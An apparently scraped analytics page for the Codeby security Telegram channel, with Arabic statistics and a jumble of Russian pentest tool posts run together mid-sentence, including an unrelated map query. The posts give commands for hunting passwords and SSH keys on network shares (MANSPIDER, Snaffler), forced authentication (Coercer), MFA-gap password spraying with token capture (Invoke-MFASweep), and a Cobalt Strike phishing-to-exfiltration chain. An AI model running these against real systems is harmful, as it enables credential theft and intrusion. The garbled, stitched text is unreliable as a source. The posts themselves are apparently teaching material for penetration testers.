Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام Codeby
تُعد قناة Codeby (@codeby_sec) في القطاع اللغوي الروسية لاعباً نشطاً. يضم المجتمع حالياً 36 590 مشتركاً، محتلاً المرتبة 3 747 في فئة التكنولوجيات والتطبيقات والمرتبة 17 795 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 36 590 مشتركاً.
بحسب آخر البيانات بتاريخ 10 يونيو, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 201، وفي آخر 24 ساعة بمقدار 15، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 7.67%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 4.14% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 2 805 مشاهدة. وخلال اليوم الأول يجمع عادةً 1 514 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 20.
- الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل edr, api, вектор, mitre, att&ck.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 11 يونيو, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
Эта функция уже доступна в Android 16 Beta 2, выпущенной на этой неделе.
[out:json];
area[name="Москва"]->.searchArea;
(
node["amenity"="pharmacy"](area.searchArea);
);
out center;pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
Опционально можно установить несколько зависимостей, чтобы добавить дополнительные возможности синтаксического анализа файлов:
apt install tesseract-ocr
apt install antiword
По умолчанию используются следующие настройки:
⏺️Глубина - 10 (переопределяется через -m)
⏺️Максимальный размер файла - 10 МБ (переопределяется через -s)
⏺️Потоки - 5 (переопределяется через -t)
⏺️Исключены общие ресурсы: C$, IPC$, ADMIN$, PRINT$ (переопределяется через --exclude-sharenames)
🔥 Примеры использования:
Поиск в сети имен файлов, которые могут содержать учетные данные. Через -f передаются имена с использование regex, -d для указания домена. Если предоставленные учётные данные не сработают, инструмент будет пробовать подключение в гостевом режиме, а затем через нулевой сеанс. Найденные файлы автоматически загружаются в $HOME/.manspider/loot.
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u user -p pass
Поиск документов, содержащих пароли. Через -e указывается расширение файла, а флаг -с указывает на поиск внутри файла с использованием regex.
manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u user -p pass
Поиск SSH-ключей по имени файла.
manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u user -p passsudo apt install arjun
📌Также установите пакет для Python ratelimit:
pip install ratelimit
Если возникла ошибка о том, что это может навредить вашей системе, используйте ключ --break-system-packages
🌚Давайте запустим простую проверку:
arjun -u http://127.0.0.1/
💡Чтобы сохранить вывод в файл, используем ключ -o или -oJ:
arjun -u http://127.0.0.1/ -o out.txt
💡Для сохранения файла в текстовом варианте, используем -oT:
arjun -u http://127.0.0.1/ -oT out.txt
📎Исходный код: https://github.com/s0md3v/ArjunSublist3r — это инструмент с открытым исходным кодом, предназначенный для поиска субдоменов доменов, помогает обнаружить скрытые поддомены, которые могут быть уязвимыми или предоставлять информацию о структуре веб-приложений.Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x. 1️⃣ Установка зависимостей Для начала нужно клонировать репозиторий Sublist3r с GitHub:
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
2️⃣ Установка зависимостей
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
pip3 install -r requirements.txt
3️⃣ Запуск поиска субдоменов
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
python3 sublist3r.py -d example.com
Команда выполнит поиск субдоменов для домена example.com.
4️⃣ Использование дополнительных опций
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.
Пример с несколькими опциями
python3 sublist3r.py -d example.com -o output.txt -p 50
Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.
Недостатки Sublist3r
1️⃣ Зависимость от сервисов — блокировки или ограничения могут снизить точность.
2️⃣ Ограниченная точность — не все субдомены индексируются.
3️⃣ Лимиты API — ограничение запросов замедляет работу.
4️⃣ Скорость — зависимость от сторонних сервисов может замедлить поиск.
5️⃣ Отсутствие аналитики — инструмент только находит субдомены, не анализируя их безопасность.Cobalt Strike — это фреймворк для постэксплуатации, который используется для имитации атак с целью проверки защиты систем. Его цель — помочь профессионалам эффективно воспроизводить реальные угрозы и тестировать защитные механизмы.Методика работы Cobalt Strike Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе. ➡️Основные шаги работы с фреймворком: 1️⃣ Получение начального доступа - через фишинг или эксплойт скомпрометированная система получает агент Beacon. 2️⃣ Командование через Beacon - Beacon устанавливает скрытный канал связи с командным сервером атакующего. 3️⃣ Расширение контроля - атакующий может использовать различные техники для перемещения по сети (например, Pass-the-Hash) и получения прав администратора. 4️⃣ Эксфильтрация данных - в конце можно скачать конфиденциальные данные или выполнить другие действия по распоряжению. ➡️Пример использования Cobalt Strike Представим пентест в организации, где исследуется безопасность сети. 1️⃣ Атакующий отправляет фишинговые письма с вложением, которое, при открытии, заражает компьютер жертвы пейлоадом Beacon. 2️⃣ Beacon связывается с сервером атакующего, давая ему возможность удалённо управлять системой. 3️⃣ Злоумышленник использует Pass-the-Hash, чтобы получить доступ к другим компьютерам в сети и повысить свои привилегии. 4️⃣ В конце пентестеры могут продемонстрировать, как злоумышленник скачивает базу данных с паролями или другую конфиденциальную информацию.
snaffler.exe -s -o snaffler.log
💱 Snaffler использует систему классификаторов, каждый из которых проверяет общие папки, папки с файлами или содержимое файлов, передавая некоторые элементы следующему классификатору, а другие отбрасывая. Каждый классификатор использует набор правил, чтобы решить, что делать с элементами, которые он классифицирует.
Эти правила могут быть очень простыми, например: "если расширение файла — .kdbx, сообщить об этом" или "если путь содержит windows\sxs, прекратить поиск подкаталогов и файлов в этом пути". В правилах также могут использоваться регулярные выражения, которые позволяют выполнять относительно сложные операции сопоставления с образцом.
🪄 Особенность инструмента заключается в объединении нескольких правил в цепочки и создание разветвлённых цепочек. Именно это позволяет Snaffler выполнять довольно глубокую проверку файлов там, где это необходимо, и при этом работать достаточно быстро.sudo apt-get install kismet
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
2️⃣ Запуск программы
Откройте терминал и запустите Kismet:
sudo kismet
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
3️⃣ Сканирование сетей
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
4️⃣ Анализ пакетов
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
1️⃣ Запустите Kismet и начните сканирование.
2️⃣ Выберите вашу сеть и просмотрите список подключённых устройств.
3️⃣ Проверьте MAC-адреса на наличие незнакомых устройств.pip3 install mitmproxy2swagger или docker:
git clone git@github.com:alufers/mitmproxy2swagger.git
cd mitmproxy2swagger
docker build -t mitmproxy2swagger .
Использование
1️⃣Для создания спецификации сначала запускаем mitmweb — веб-интерфейс, встроенный в mitmproxy, с помощью команды mitmweb. Теперь необходимо настроить браузер, чтобы весь трафик проходил через mitmproxy.
2️⃣Изучаем наш целевой сайт, самостоятельно переходим на разные эндпоинты, генерируя трафик. Далее необходимо сохранить полученные пакеты в файл и запустить команду:
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.
3️⃣При выполнении первого прохода в файле схемы появляются эндпоинты API, которые удалось вычленить из файла, с префиксом ignore. Его необходимо удалить и запустить второй проход, тем самым сгенерировав описания конечных точек:
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
4️⃣ Финальный шаг — скопировать полученное описание в swagger для получения удобочитаемой документации.
‼️ Удобным является поддержка в mitmproxy2swagger формата har. Можно также осуществить взаимодействие с целевым веб-сайтом и экспортировать трафик из браузера DevTools на вкладке Network и проделать шаги 2-4.python3 -m pip install coercer.
3 режима работы:
⏺️scan - проверка методов с известными рабочими путями для всех методов;
⏺️coerce - запуск принудительной аутентификации через все известные методы с известными рабочими путями. В данном режим на своей машине также необходимо запустить responder;
⏺️fuzz - проверка каждого метода со списком путей эксплойта.
💻 Примеры использования:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
coercer scan -u user -p pass -t 10.0.0.8 -v
Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
coercer coerce -u user -p pass -l 10.0.0.80 -t 10.0.0.8 --always-continue
Прослушивание вызовов удалённых процедур на компьютере с разными путями.
coercer fuzz -u user -p pass -t 10.0.0.8 -vNessus — это популярный инструмент для сканирования уязвимостей, разработанный компанией Tenable, который направлен на выявление слабых мест в системах и сетях, предотвращая возможные атаки.Функции Nessus ⌨️ Проверяет системы на наличие известных угроз, таких как ошибки конфигурации и устаревшие версии ПО. ⌨️ Работает с Windows, Linux, macOS и сетевыми устройствами. ⌨️ Обновляемая база плагинов позволяет находить даже новые уязвимости. ⌨️ Удобный веб-интерфейс для настройки сканирования и просмотра отчетов. Пример использования Nessus через CLI 1️⃣ Установка на Linux Nessus
sudo apt install nessus
2️⃣ Запуск
sudo systemctl start nessusd
Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.
3️⃣ Аутентификация через CLI
nessuscli login -u <username> -p <password>
4️⃣ Запуск сканирования
nessuscli scan --name "Network Scan" --targets "192.168.1.0/24" --policy "basic-network-scan"
5️⃣ Просмотр результатов
nessuscli report --scan-id <scan_id>
⌨️Преимущества Nessus
⌨️ Регулярные обновления плагинов позволяют находить новые уязвимости.
⌨️ Поддерживает различные операционные системы и сетевые устройства.
⌨️Недостатки Nessus
⌨️ Для полной функциональности нужна платная лицензия.
⌨️ При сканировании больших сетей может сильно нагружать ресурсы.Invoke-GraphAPIAuth)
⏺️Azure Service Management API (Invoke-AzureManagementAPIAuth)
⏺️Microsoft 365 Exchange Web Services (Invoke-EWSAuth)
⏺️Microsoft 365 Web Portal (Invoke-O365WebPortalAuth)
⏺️Microsoft 365 Active Sync (Invoke-O365ActiveSyncAuth)
⏺️ADFS (Invoke-ADFSAuth)
💡 Примеры использования:
Команда будет пытаться войти во все сервисы кроме ADFS. При успешном входе токены и/или файлы cookie будут записаны в AccessTokens.json.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens
Команда работает с с методами аутентификации по умолчанию и проверяет наличие ADFS.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -Recon -IncludeADFS
Команда будет перебирать различные типы ресурсов и идентификаторы клиентов во время аутентификации ROPC, чтобы найти однофакторный доступ для различных комбинаций идентификаторов клиентов и ресурсов.
Invoke-BruteClientIDs -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens🗣️ Reversing Labs сообщили о проблеме в службу безопасности Hugging Face. Модели удалили в течение 24 часов, а Picklescan обновили, чтобы он мог обнаруживать угрозы в «сломанных» Pickle-файлах.Если вы работаете с AI-моделями, избегайте загрузки Pickle-файлов из непроверенных источников. Атаки на ML-платформы становятся все изощреннее — будьте внимательны! #новости
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
